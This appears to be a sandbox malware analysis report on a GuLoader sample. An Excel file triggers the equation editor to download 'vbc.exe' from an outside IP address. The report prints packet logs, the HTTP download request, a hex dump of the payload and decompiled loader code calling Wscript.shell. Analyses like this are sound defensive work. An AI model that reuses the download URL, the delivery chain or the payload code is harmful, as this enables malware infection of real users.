        Sep 14, 2021 21:51:37.568296909 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568311930 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568317890 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568327904 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568336010 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568344116 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568356991 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568363905 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568377018 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568382978 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568397999 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568398952 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568414927 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568418980 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568430901 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568438053 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568447113 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568460941 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568463087 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568480015 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568483114 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568499088 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568500042 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568517923 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568519115 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568533897 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568537951 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568550110 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568552971 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568569899 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568578959 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568582058 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568598032 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568602085 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568614006 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568620920 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568641901 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.569489002 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.597373009 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.597407103 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.597466946 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.597750902 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.597769976 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.597784042 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.597819090 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.597847939 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.597862959 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.597882032 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.597898960 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.597910881 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.597917080 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.597924948 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.597937107 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.597943068 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.597954988 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.597963095 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.597973108 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.597979069 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.597991943 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.597996950 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598011971 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598016024 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598031998 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598050117 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598061085 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598062992 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598067045 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598076105 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598086119 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598093987 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598094940 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598108053 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598145008 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598159075 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598176003 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598193884 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598211050 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598232985 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598251104 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598265886 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598268032 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598277092 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598279953 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598283052 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598284006 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598287106 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598289967 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598293066 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598295927 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598299026 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598300934 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598301888 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598315954 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598320007 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598331928 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598336935 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598349094 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598354101 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598366976 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598367929 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598381996 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598387003 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598395109 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598403931 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598416090 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598421097 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598434925 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598438025 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598453999 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598457098 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598469973 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598474979 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598485947 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598491907 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598503113 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.598504066 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598524094 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.598543882 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.599036932 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:38.109549999 CEST4916580192.168.2.22212.192.246.25

        HTTP Request Dependency Graph

        • 212.192.246.25

        HTTP Packets

        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.2249165212.192.246.2580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        TimestampkBytes transferredDirectionData
        Sep 14, 2021 21:51:37.438657045 CEST0OUTGET /rever/vbc.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 212.192.246.25
        Connection: Keep-Alive
        Sep 14, 2021 21:51:37.473706961 CEST1INHTTP/1.1 200 OK
        Date: Tue, 14 Sep 2021 19:51:37 GMT
        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
        Last-Modified: Mon, 13 Sep 2021 23:18:39 GMT
        ETag: "21000-5cbe8af7096b4"
        Accept-Ranges: bytes
        Content-Length: 135168
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/x-msdownload
        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 89 db 56 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 01 00 00 90 00 00 00 00 00 00 70 13 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 b5 a3 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 b9 01 00 28 00 00 00 00 10 02 00 22 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 ad 01 00 00 10 00 00 00 b0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 64 45 00 00 00 c0 01 00 00 10 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 22 3b 00 00 00 10 02 00 00 40 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6WWWKWuWqWRichWPELVVp@P$(";8 $.text `.datadE@.rsrc";@@@IMSVBVM60.DLL
        Sep 14, 2021 21:51:37.473750114 CEST3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii:
        Sep 14, 2021 21:51:37.473776102 CEST4INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii:
        Sep 14, 2021 21:51:37.473799944 CEST5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii:
        Sep 14, 2021 21:51:37.505139112 CEST7INData Raw: 00 00 00 00 01 00 00 00 00 00 00 00 00 00 53 59 4e 43 45 50 48 41 4c 55 53 00 00 00 00 00 00 00 00 00 ff cc 31 00 07 77 ef cf a5 5b 2d f3 46 a1 48 0f 53 48 b8 2f 76 d0 80 eb 61 28 2f 59 4b 80 2e 67 ad b2 b8 df 8f 3a 4f ad 33 99 66 cf 11 b7 0c 00
        Data Ascii: SYNCEPHALUS1w[-FHSH/va(/YK.g:O3f``BPIGWIDGEONFALLESB$FALLES5DFList1x*Check3POR
        Sep 14, 2021 21:51:37.505177975 CEST8INData Raw: 00 00 00 00 10 19 40 00 01 00 00 00 18 19 40 00 00 00 00 00 14 19 40 00 01 00 00 00 18 19 40 00 00 00 b7 01 68 00 6c 00 40 19 40 00 3c e9 41 00 00 00 00 00 5c 1f 80 00 ac 32 40 00 bc 32 40 00 40 00 1f 00 34 00 00 00 a4 2d 40 00 ff ff ff ff 00 00
        Data Ascii: @@@@hl@@<A\2@2@@4-@@@u|-@@@X@^@d@
        Sep 14, 2021 21:51:37.505202055 CEST10INData Raw: 40 00 ff ff ff ff 00 00 00 00 00 00 00 00 30 1e 40 00 c0 75 7c 00 b4 2d 40 00 ff ff ff ff 00 00 00 00 08 1e 40 00 88 1d 40 00 58 13 40 00 5e 13 40 00 64 13 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii: @0@u|-@@@X@^@d@8*@A+@Ab~<@\3@
        Sep 14, 2021 21:51:37.505224943 CEST11INData Raw: 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b1 00 00 00 00 00 00 00 c8 36 40 00 3c 01 00 00 50 00 00 00 77 21 e3 14 d1 da 02 4f b5 c7 b7 2a ae 53 87 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii: 6@<Pw!O*S4@Pit@P$lX08@P NW)7Af;$N
        Sep 14, 2021 21:51:37.505254984 CEST13INData Raw: 40 00 58 13 40 00 5e 13 40 00 64 13 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 26 40 00 0c 25 40 00 58 13 40 00
        Data Ascii: @X@^@d@T&@%@X@^@d@|&@%@X@^@d@
        Sep 14, 2021 21:51:37.505284071 CEST14INData Raw: 99 66 cf 11 b7 0c 00 aa 00 60 d3 93 4c 69 73 74 31 00 00 00 46 72 61 6d 65 33 00 00 fa 4e ad 33 99 66 cf 11 b7 0c 00 aa 00 60 d3 93 43 68 65 63 6b 31 00 00 43 68 65 63 6b 32 00 00 43 68 65 63 6b 33 00 00 55 6e 70 6c 69 61 62 69 6c 69 74 79 00 00
        Data Ascii: f`List1Frame3N3f`Check1Check2Check3UnpliabilityCHAIRMANNINGdommerkomiteers\Wscript.shell4:4:4#=h8+3q"=h8+3qp.@.@yO3f`
        Sep 14, 2021 21:51:37.505306959 CEST15INData Raw: 87 f1 c9 27 1f f6 5f bf 56 44 bf ca b8 b1 4c 82 c2 96 90 37 7d 59 a8 98 0f 47 9e e9 1d d5 83 e3 aa 36 58 69 08 46 76 c4 5a 40 b1 f4 87 1c 87 64 85 25 e8 85 bc 69 74 c5 a3 40 91 b4 50 24 9c 6c 85 58 61 35 b9 65 ac 37 c1 45 84 48 af bd 37 1e 69 b1
        Data Ascii: '_VDL7}YG6XiFvZ@d%it@P$lXa5e7EH7if`EZ}WDLx d NW)7Af;$NiHudYAB?JzT WLT'{`"HLmP;EGQK/XJK^W|FU7g@


        Code Manipulations

        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        Behavior

        Click to jump to process

        System Behavior

        General

        Start time:21:50:25
        Start date:14/09/2021
        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        Wow64 process (32bit):false
        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Imagebase:0x13ff60000
        File size:28253536 bytes
        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate

        General

        Start time:21:50:47
        Start date:14/09/2021
        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        Wow64 process (32bit):true
        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Imagebase:0x400000
        File size:543304 bytes
        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        General

        Start time:21:50:48
        Start date:14/09/2021
        Path:C:\Users\Public\vbc.exe
        Wow64 process (32bit):true
        Commandline:'C:\Users\Public\vbc.exe'
        Imagebase:0x400000
        File size:135168 bytes
        MD5 hash:ED004FE1AA9F4FA169A05B6716C03484
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:Visual Basic
        Yara matches:
        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Author: Joe Security
        Antivirus matches:
        • Detection: 100%, Joe Sandbox ML
        Reputation:low

        Disassembly

        Code Analysis

        Reset < >

          Executed Functions

          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 00456D94
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID: AllocateMemoryVirtual
          • String ID: <t$
          • API String ID: 2167126740-3814652957
          • Opcode ID: 6ed76021d63f8da709a28c4d061a04db0be46088974cf227e8a5c1eb94c1ad2f
          • Instruction ID: e2050265b1806d34f800cb187a0b26dcbb8ce97cb7ee3084623cf3274b2b844d
          • Opcode Fuzzy Hash: 6ed76021d63f8da709a28c4d061a04db0be46088974cf227e8a5c1eb94c1ad2f
          • Instruction Fuzzy Hash: 0C519A7A6012854FE7708F68DC813CF7BAABF59389F155129DC0C9B353E2328E4A8781
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 00456D94
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID: AllocateMemoryVirtual
          • String ID: <t$
          • API String ID: 2167126740-3814652957
          • Opcode ID: 415d50d6abfa2468c8b2e2efb81405e5b27dd780eaed8b34ad4d1dc42307c2eb
          • Instruction ID: 49e1ed7d684e7bce45259f3d7f54453b2c563067d25eddff3104caff92974108
          • Opcode Fuzzy Hash: 415d50d6abfa2468c8b2e2efb81405e5b27dd780eaed8b34ad4d1dc42307c2eb
          • Instruction Fuzzy Hash: D351767A6002898FD7708F68CC813DF77A9BF19345F51412AEC0CAB302E7358E4A8B85
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 00456D94
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID: AllocateMemoryVirtual
          • String ID: <t$
          • API String ID: 2167126740-3814652957
          • Opcode ID: 40edbc168e292eabe8522d0a67279d58fb9e2c217d95d0c2a18844b5afc05052
          • Instruction ID: 0d1f1952c21fec76691df30ffb06c95595eac78c9647e515423e3ef228efa12a
          • Opcode Fuzzy Hash: 40edbc168e292eabe8522d0a67279d58fb9e2c217d95d0c2a18844b5afc05052
          • Instruction Fuzzy Hash: C351757A6043858FD7708F68DC813DF7BA9BF19345F15412ADC0C9B342E7358A4A8B86
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 00456D94
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID: AllocateMemoryVirtual
          • String ID:
          • API String ID: 2167126740-0
          • Opcode ID: 69ef1c56d5a19c6c91d5e361bea0cb695e975d766e896bfb5ce08bc9e439ef44
          • Instruction ID: 3e903d3424b81ca278df359a1d9127ff9f8f6aa16863a5e61d6f0d865e64cf90
          • Opcode Fuzzy Hash: 69ef1c56d5a19c6c91d5e361bea0cb695e975d766e896bfb5ce08bc9e439ef44
          • Instruction Fuzzy Hash: F151787A6012C54FE7708F68DC813CF7BA9BB5A349F155229DC0C9B353E2328E4A8781
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 00456D94
          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID: AllocateMemoryVirtual
          • String ID:
          • API String ID: 2167126740-0
          • Opcode ID: 8a2eb3db101ce4883cd149cddf60aafaeafc522444c58025d7aa33357dd75c10
          • Instruction ID: 6efff53e7c04e481542f2d8644da9e6a5f7e89474b88ff0c2fb9d76fcd73a9fd
          • Opcode Fuzzy Hash: 8a2eb3db101ce4883cd149cddf60aafaeafc522444c58025d7aa33357dd75c10
          • Instruction Fuzzy Hash: 06416B3A6012914FD7254FA8DC512CF7BA9BF5A349F15A12ADC089F313E2328E4A87C5
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 66%
          			E00419524(void* __ebx, void* __edi, void* __esi, long long __fp0, signed int _a4) {
          				signed int _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				intOrPtr _v28;
          				signed int _v32;
          				char _v36;
          				intOrPtr* _v48;
          				char _v52;
          				char _v56;
          				signed int _v60;
          				intOrPtr _v64;
          				intOrPtr _v68;
          				signed int _v72;
          				short _v80;
          				signed int _v84;
          				char _v100;
          				signed int _t66;
          				intOrPtr _t68;
          				char* _t75;
          				signed int _t79;
          				char* _t81;
          				char* _t82;
          				void* _t83;
          				void* _t89;
          				void* _t90;
          				void* _t91;
          				void* _t93;
          				void* _t94;
          				void* _t96;
          				intOrPtr _t97;
          				intOrPtr _t98;
          				long long _t104;
          
          				_t104 = __fp0;
          				_t90 = __esi;
          				_t89 = __edi;
          				_t83 = __ebx;
          				_t94 = _t96;
          				_t97 = _t96 - 0xc;
          				 *[fs:0x0] = _t97;
          				L004011C0();
          				_v16 = _t97;
          				_v12 = 0x401130;
          				_v8 = _a4 & 0x00000001;
          				_a4 = _a4 & 0xfffffffe;
          				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x4011c6, _t93);
          				_t66 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4);
          				asm("fclex");
          				_v60 = _t66;
          				if(_v60 >= 0) {
          					_v72 = _v72 & 0x00000000;
          				} else {
          					_push(0x2b4);
          					_push(0x402cc8);
          					_push(_a4);
          					_push(_v60);
          					L00401352();
          					_v72 = _t66;
          				}
          				_v32 = 0x30bc37c;
          				asm("fild dword [ebp-0x1c]");
          				_v80 = _t104;
          				if( *0x41c000 != 0) {
          					_push( *0x40112c);
          					_push( *0x401128);
          					L004011E4();
          				}
          				L0040134C();
          				_v32 = _t66;
          				while(1) {
          					_t68 = _v28 + 1;
          					if(_t68 < 0) {
          						break;
          					}
          					_v28 = _t68;
          					_t79 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v56);
          					_v60 = _t79;
          					if(_v60 >= 0) {
          						_v84 = _v84 & 0x00000000;
          					} else {
          						_push(0x6f8);
          						_push(0x402cf8);
          						_push(_a4);
          						_push(_v60);
          						L00401352();
          						_v84 = _t79;
          					}
          					if(_v28 >= 0x1e8480) {
          						_push(0);
          						_push(L"Wscript.shell");
          						_push( &_v52); // executed
          						L0040133A(); // executed
          						_t81 =  &_v52;
          						_push(_t81);
          						L00401340();
          						_push(_t81);
          						_t82 =  &_v36;
          						_push(_t82);
          						L00401346();
          						L00401334();
          						_v32 = 0xc0177;
          						_t91 = 0;
          						do {
          							_t91 = _t91 + 1;
          						} while (_t91 != 0x36fe7d);
          						_push(_t83);
          						_push(_t82);
          						_push(_t91 + 0x9fc78);
          						return _t82;
          					} else {
          						continue;
          					}
          					L18:
          				}
          				L00401328();
          				_t98 = _t97 - 0xc;
          				 *[fs:0x0] = _t98;
          				L004011C0();
          				_v68 = _t98;
          				_v64 = 0x401140;
          				_v60 = 0;
          				 *((intOrPtr*)( *_v48 + 4))(_v48, _t89, _t90, _t83, 0x20,  *[fs:0x0], 0x4011c6, _t94);
          				_push(L"4:4:4");
          				_push( &_v100); // executed
          				L00401316(); // executed
          				_t75 =  &_v100;
